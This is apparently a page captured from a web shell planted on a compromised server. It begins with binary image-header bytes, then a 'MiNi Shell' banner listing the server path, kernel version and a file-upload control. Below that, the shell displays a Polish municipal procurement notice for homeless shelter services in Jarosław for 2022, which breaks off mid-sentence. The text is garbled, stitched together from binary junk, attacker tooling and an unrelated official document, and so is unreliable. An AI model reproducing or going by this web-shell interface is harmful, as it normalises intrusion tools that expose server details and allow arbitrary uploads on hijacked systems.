JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211213/0031223901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zapewnienie schronienia dla osób bezdomnych<br/>z terenu Gminy Miejskiej Jarosław w 2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W JAROSŁAWIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650129377</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Juliusza Słowackiego 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jarosław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mops@mops.jaroslaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://jaroslaw.naszops.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zapewnienie schronienia dla osób bezdomnych<br/>z terenu Gminy Miejskiej Jarosław w 2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ec8d4795-5c00-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00312239</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/um_jaroslaw</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a)	Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”<br/>W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.<br/>b)	Zamawiający, określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a.	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b.	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c.	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d.	włączona obsługa JavaScript,<br/>e.	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f.	Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g.	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/><br/>c)	Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>•	Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>•	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>-	.zip <br/>-	7Z<br/>•	Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>•	Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB.<br/>2.	Za datę przekazania Oferty, oświadczenia, o którym mowa w art. 125 ust. 1 uPzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na Platformę Zakupową w pozostałych przypadkach - mail.<br/>3.	Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniem dot. środków komunikacji elektronicznej.<br/>4.	Zamawiający informuje, że zgodnie z art. 284 ust. 6 uPzp treść zapytań wraz z wyjaśnieniami (bez ujawnienia źródła zapytania) udostępni na stronie internetowej prowadzonego postępowania. Tym samym wszelkie informacje przekazywane Wykonawcom stanowią integralną część specyfikacji warunków zamówienia i dotyczą wszystkich Wykonawców biorących udział w ww. postępowaniu. Wykonawca jest zobowiązany złożyć ofertę uwzględniającą wszelkie zmiany i wyjaśnienia zawarte w Informacjach dla Wykonawców.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/um_jaroslaw</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MOPS.271.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Schronisko dla bezdomnych mężczyzn<br/><br/>1)	Przedmiotem zamówienia jest świadczenie usług schronienia wraz z wyżywieniem w schronisku dla bezdomnych mężczyzn z terenu Gminy Miejskiej Jarosław dla szacunkowo 12 bezdomnych mężczyzn w okresie od 01.01.2022 r. do 31.12.2022 r. (podana przez Zamawiającego liczba bezdomnych mężczyzn jest liczbą przewidywaną w całym okresie trwania niniejszego zamówienia; osoby bezdomne, będą kierowane do schroniska w różnych terminach i na różne okresy czasu; Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia liczby osób w zależności od faktycznych potrzeb w tym zakresie; z tego tytułu Wykonawcy nie będą przysługiwały żadne roszczenia, w tym pieniężne wobec Zamawiającego; Zamawiający będzie dokonywał zapłaty za faktyczną liczbę osób korzystających z usług świadczonych przez schronisko).<br/>2)	Nazwy i kody wg wspólnego słownika zamówień (CPV): 85311000-2<br/>3)	Schronisko musi funkcjonować przez cały rok, przez 7 dni w tygodniu<br/>i zapewniać możliwość całodobowego przebywania<br/>4)	Udzieleniem schronienia w formie schroniska dla osób bezdomnych będą objęte osoby z terenu Gminy Miejskiej Jarosław legitymujące się decyzją administracyjną o udzieleniu schronienia po zawarciu kontraktu socjalnego (obowiązek zawarcia kontraktu socjalnego nie dotyczy osób, którym schronienia w schronisku dla osób bezdomnych udziela gmina miejsca jej pobytu,<br/>na podstawie art. 101 ust. 3 ustawy z dnia 12 marca 2004 r. o pomocy społecznej). Osoby bezdomne będą obowiązane do ponoszenia odpłatności za pobyt<br/>w schronisku zgodnie z właściwą uchwałą Rady Miasta Jarosławia.<br/>5)	Schronisko obowiązane jest zapewnić osobom bezdomnym usługi ukierunkowane na wzmacnianie aktywności społecznej, wyjście z bezdomności i uzyskanie samodzielności życiowej. <br/>6)	Do wykonywania czynności w zakresie usług świadczonych w schronisku dla osób bezdomnych Wykonawca zobowiązany jest zatrudniać:<br/>a)	pracowników socjalnych,<br/>b)	opiekunów posiadających wykształcenie zasadnicze branżowe lub zasadnicze zawodowe, co najmniej roczne doświadczenie w pracy z osobami bezdomnymi oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy lub wykształcenie co najmniej średnie lub średnie branżowe oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy.<br/>7)	Usługi świadczone w schronisku dla osób bezdomnych oraz obiekt, w którym zlokalizowane jest schronisko muszą spełniać odpowiednie warunki przeciwpożarowe i sanitarno-higieniczne oraz minimalne standardy określone w załączniku nr 2 do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 poz.896).<br/>8)	Wykonawca wyłoniony w postępowaniu obowiązany będzie do prowadzenia dokumentacji dotyczącej osób, którym udzielono schronienia w schronisku dla osób bezdomnych tj. karty pobytu osoby bezdomnej zawierającej datę przyjęcia do schroniska, datę opuszczenia schroniska, nr decyzji, list obecności, karty pracy socjalnej, dokumentów współpracy klientów z innymi placówkami, policją i innymi instytucjami. <br/>9)	Wykonawca zobowiązany będzie do niezwłocznego pisemnego, mailowego lub telefonicznego poinformowania Zamawiającego o niezgłoszeniu się, nieprzebywaniu klienta w schronisku lub ogrzewalni przez okres dłuższy niż przez 3 kolejne dni, a także o wszystkich sytuacjach wydalenia klienta ze schroniska z podaniem przyczyny w terminie nie dłuższym niż 1 dzień od dnia zdarzenia.<br/>10)	Do obowiązków Wykonawcy realizujących usługi należeć będzie:<br/>a)	wykonywanie czynności będących przedmiotem umowy pomiędzy Zamawiającym a Wykonawcą z najwyższą starannością, zgodnie z zawartą umową oraz zgodnie z ustawą z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz. U. z 2020 r. poz. 1876 z późn. zm.) oraz rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 r. poz. 896) oraz nadzór nad prawidłowym jej wykonywaniem,<br/>b)	po każdym miesiącu wykonywania usług Wykonawca przedstawi Zamawiającemu fakturę/rachunek za wykonaną usługę oraz miesięczną informację składającą się z ewidencji osób przyjętych do schroniska i/lub schroniska z usługami opiekuńczymi i/lub noclegowni i/lub ogrzewalni oraz list obecności osób przebywających w w/w placówkach podpisanych przez te osoby (rozliczenie faktury/rachunku nastąpi na podstawie faktycznej ilości dni i liczby osób korzystających ze świadczenia schronienia; Zamawiający ureguluje należność powstałą z tytułu wykonania usługi schronienia w terminie 14 dni od dnia otrzymania prawidłowo otrzymanej faktury/rachunku; należność za wykonanie usługi będzie płatna na rachunek bankowy Zamawiającego wskazany na fakturze/rachunku),<br/>c)	Wykonawca obowiązany będzie do udostępniania Zamawiającemu wszelkich dokumentów związanych z realizacją umowy Zamawiającemu oraz innym uprawnionym podmiotom, w celu kontroli w zakresie prawidłowej realizacji usługi,<br/>d)	Wykonawca obowiązany będzie do wdrożenia i stosowania opracowanej przez Ministerstwo Rodziny i Polityki Społecznej Procedury dla podmiotów prowadzących placówki udzielające wsparcia osobom bezdomnym w czasie epidemii oraz instrukcją postępowania w sytuacji podejrzenia u osoby bezdomnej zarażenia wirusem SARS-CoV-2 (procedura opublikowana jest pod adresem: https://www.gov.pl/attachment/ad6461f2-c377-4f67-a21a-c9f0d5470353). <br/>e)	Wykonawca zobowiązany będzie podczas realizacji umowy do zapewnienia dostępności architektonicznej i/lub informacyjno-komunikacyjnej osobom ze szczególnymi potrzebami na poziomie minimalnych wymagań, określonych w art. 6-7 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2020 r. poz. 1062) oraz wykazania w ofercie konkretnych działań w tym zakresie.<br/>f)	W przypadku gdy w trakcie realizacji zamówienia wydane zostaną nowe wytyczne bądź ustanowione zostaną określone ograniczenia, nakazy i zakazy w związku z wystąpieniem stanu epidemii, stanu zagrożenia epidemicznego lub stanu nadzwyczajnego, Wykonawca obowiązany będzie do ich wdrożenia lub zastosowania się do nich. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - Schronisko dla bezdomnych kobiet<br/><br/>1)	Przedmiotem zamówienia jest świadczenie usług schronienia wraz<br/>z wyżywieniem w schronisku dla bezdomnych kobiet z terenu Gminy Miejskiej Jarosław dla szacunkowo 10 bezdomnych kobiet w okresie od 01.01.2022 r. do 31.12.2022 r. (podana przez Zamawiającego liczba bezdomnych kobiet jest liczbą przewidywaną w całym okresie trwania niniejszego zamówienia; osoby bezdomne, będą kierowane do schroniska w różnych terminach i na różne okresy czasu; Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia liczby osób w zależności od faktycznych potrzeb w tym zakresie; z tego tytułu Wykonawcy nie będą przysługiwały żadne roszczenia, w tym pieniężne wobec Zamawiającego; Zamawiający będzie dokonywał zapłaty za faktyczną liczbę osób korzystających<br/>z usług świadczonych przez schronisko).<br/>2)	Nazwy i kody wg wspólnego słownika zamówień (CPV): 85311000-2.<br/>3)	Schronisko musi funkcjonować przez cały rok, przez 7 dni w tygodniu<br/>i zapewniać możliwość całodobowego przebywania.<br/>4)	Udzieleniem schronienia w formie schroniska dla osób bezdomnych będą objęte osoby z terenu Gminy Miejskiej Jarosław legitymujące się decyzją administracyjną o udzieleniu schronienia po zawarciu kontraktu socjalnego (obowiązek zawarcia kontraktu socjalnego nie dotyczy osób, którym schronienia w schronisku dla osób bezdomnych udziela gmina miejsca jej pobytu, na podstawie art. 101 ust. 3 ustawy z dnia 12 marca 2004 r. o pomocy społecznej). Osoby bezdomne będą obowiązane do ponoszenia odpłatności za pobyt w schronisku zgodnie z właściwą uchwałą Rady Miasta Jarosławia.<br/>5)	Schronisko obowiązane jest zapewnić osobom bezdomnym usługi ukierunkowane na wzmacnianie aktywności społecznej, wyjście z bezdomności i uzyskanie samodzielności życiowej. <br/>6)	Do wykonywania czynności w zakresie usług świadczonych w schronisku dla osób bezdomnych Wykonawca zobowiązany jest zatrudniać:<br/>a)	pracowników socjalnych,<br/>b)	opiekunów posiadających wykształcenie zasadnicze branżowe lub zasadnicze zawodowe, co najmniej roczne doświadczenie w pracy z osobami bezdomnymi oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy lub wykształcenie co najmniej średnie lub średnie branżowe oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy.<br/>7)	Usługi świadczone w schronisku dla osób bezdomnych oraz obiekt, w którym zlokalizowane jest schronisko muszą spełniać odpowiednie warunki przeciwpożarowe i sanitarno-higieniczne oraz minimalne standardy określone w załączniku nr 2 do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 poz.896).<br/>8)	Wykonawca wyłoniony w postępowaniu obowiązany będzie do prowadzenia dokumentacji dotyczącej osób, którym udzielono schronienia w schronisku dla osób bezdomnych tj. karty pobytu osoby bezdomnej zawierającej datę przyjęcia do schroniska, datę opuszczenia schroniska, nr decyzji, list obecności, karty pracy socjalnej, dokumentów współpracy klientów z innymi placówkami, policją i innymi instytucjami. <br/>9)	Wykonawca zobowiązany będzie do niezwłocznego pisemnego, mailowego lub telefonicznego poinformowania Zamawiającego o niezgłoszeniu się, nieprzebywaniu klienta w schronisku lub ogrzewalni przez okres dłuższy niż przez 3 kolejne dni, a także o wszystkich sytuacjach wydalenia klienta ze schroniska z podaniem przyczyny w terminie nie dłuższym niż 1 dzień od dnia zdarzenia.<br/>10)	Do obowiązków Wykonawcy realizujących usługi należeć będzie:<br/>a)	wykonywanie czynności będących przedmiotem umowy pomiędzy Zamawiającym a Wykonawcą z najwyższą starannością, zgodnie z zawartą umową oraz zgodnie z ustawą z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz. U. z 2020 r. poz. 1876 z późn. zm.) oraz rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 r. poz. 896) oraz nadzór nad prawidłowym jej wykonywaniem,<br/>b)	po każdym miesiącu wykonywania usług Wykonawca przedstawi Zamawiającemu fakturę/rachunek za wykonaną usługę oraz miesięczną informację składającą się z ewidencji osób przyjętych do schroniska i/lub schroniska z usługami opiekuńczymi i/lub noclegowni i/lub ogrzewalni oraz list obecności osób przebywających w w/w placówkach podpisanych przez te osoby (rozliczenie faktury/rachunku nastąpi na podstawie faktycznej ilości dni i liczby osób korzystających ze świadczenia schronienia; Zamawiający ureguluje należność powstałą z tytułu wykonania usługi schronienia w terminie 14 dni od dnia otrzymania prawidłowo otrzymanej faktury/rachunku; należność za wykonanie usługi będzie płatna na rachunek bankowy Zamawiającego wskazany na fakturze/rachunku),<br/>c)	Wykonawca obowiązany będzie do udostępniania Zamawiającemu wszelkich dokumentów związanych z realizacją umowy Zamawiającemu oraz innym uprawnionym podmiotom, w celu kontroli w zakresie prawidłowej realizacji usługi,<br/>d)	Wykonawca obowiązany będzie do wdrożenia i stosowania opracowanej przez Ministerstwo Rodziny i Polityki Społecznej Procedury dla podmiotów prowadzących placówki udzielające wsparcia osobom bezdomnym w czasie epidemii oraz instrukcją postępowania w sytuacji podejrzenia u osoby bezdomnej zarażenia wirusem SARS-CoV-2 (procedura opublikowana jest pod adresem: https://www.gov.pl/attachment/ad6461f2-c377-4f67-a21a-c9f0d5470353). <br/>e)	Wykonawca zobowiązany 